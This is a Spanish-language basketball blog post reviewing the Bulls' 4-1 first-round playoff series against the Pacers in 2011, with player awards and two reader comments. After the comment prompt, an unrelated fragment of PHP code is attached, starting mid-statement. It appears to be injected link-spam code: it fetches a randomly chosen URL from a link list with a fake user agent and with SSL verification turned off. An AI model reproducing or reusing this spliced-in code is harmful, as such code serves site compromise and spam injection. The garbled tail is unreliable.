Primera Ronda del Este: Bulls 4 – Pacers 1

28 de April de 2011 por TheDeerHunter

Se impuso la lógica. Se palpa una vez más el desequilibrio que existe en la conferencia Este. Unos Bulls sin mucho lustre han ganado cómodamente una eliminatoria muy meritoria por parte de los Pacers.

Con tan sólo un partido resuelto por más de 6 puntos de diferencia puede parecer que ha habido mucha igualdad pero en realidad se ha intuído en todo momento una mayor distancia entre ambos equipos. Los Bulls podían subir un peldaño en momentos clave y los Pacers no. De hecho, pocos pensamos que hayamos visto la punta del iceberg del equipo de Tom Thibodeau.

El campeón de la regular ha atacado algo peor que durante la temporada, un punto menos, pero ha logrado hacer caer hasta en 10 puntos nada menos los guarismos de Indiana. El equipo de Vogel sin su ataque apenas tiene nada.

En la previa dimos tres claves: El marcaje de Derrick Rose ha sido poco menos que inexistente. Ha superado su ya de por si altísimos promedios (27 puntos) que tenía contra ellos. No ha ayudado la baja forma y el conato de lesión de Collison pero tampoco han habido alternativas viables. El intento con Paul George en el último partido fue un absoluto fracaso.

La batalla en las alas también la ha ganado Chicago. Luol Deng ha mirado de tú a tú a Granger, única esperanza de su equipo, toda la serie mientras que Korver y Bogans han cumplido con creces. El recurso de Dahntay Jones era a la desesperada con un Dunleavy terriblemente gris.

Por si faltaba poco el rebote también lo han ganado los toros. Los Pacers no han podido aprovechar una floja serie de Carlos Boozer. Hansbrough ha estado intermitente y Hibbert no ha marcado las diferencias que se espera que llegue a marcar algún día.

PREMIOS

MVP: Va camino de llevárselos todos. Derrick Rose ha sido una pesadilla para los Pacers, imparable con 27.6 ptos, 4.6 rebotes, 6.2 asistencias, 2.6 robos y 1.2 tapones. Y lo peor es que no ha estado fino, sinó hubiera sido algo mítico.

Sorpresa: Algunos descubrieron a Tyler Hansbrough en el primer partido de esta serie. Por desgracia, después no ha tenido continuidad pero por momentos se ha comido al mismísimo Carlos Boozer.

Decepción: Ya no sabemos si llamarlo decepción porque muy pocos esperan algo de él. Mike Dunleavy estaba llamado a cotas más altas que 14.4 minutos por partido, 5 puntitos y algún que otro rebote y asistencia.

El mayor esfuerzo en vano: Tiene mucho mérito lo de Danny Granger. Muchos jugadores de su talento estarían absolutamente desquiciados pero el continúa ganando partidos con todo en contra. Pocas veces se le ha visto rendirse. 21.6 puntos, 5.6 rebotes y 3.2 asistencias de superclase. A menudo nos olvidamos que es uno de los mejores aleros de la liga.

Comenta

2 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Al igual que ocurre con Celtics y Heat ahora empiezan los PO de verdad, ya que tanto los de Orlando como los de Atlanta son buena piedra de toque para ver realmente a qué aspiran los Bulls realmente. El cinco inicial es sencillamente sensacional, y con un banquillo en la que por momentos sobresale el tirador Korver debería demostrar en segunda ronda el poderío de la regular. Creo que incluso les ha venido bien esta primera ronda contra Indiana, que no les ha puesto las cosas nada fáciles. Esperemos que lleguen bastante lejos, e incluso que ganen el anillo…

      Citar

  2. Jabho dice:
    #2

    Los Bulls creo que van a ser un rival duro para cualquiera, pero no les veo candidatos a ganar el anillo por ahora. Les falta tamaño por dentro y un tirador que abra defensas cerradas. Los Pacers eran con mucho el peor de los 16 equipos de PO.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>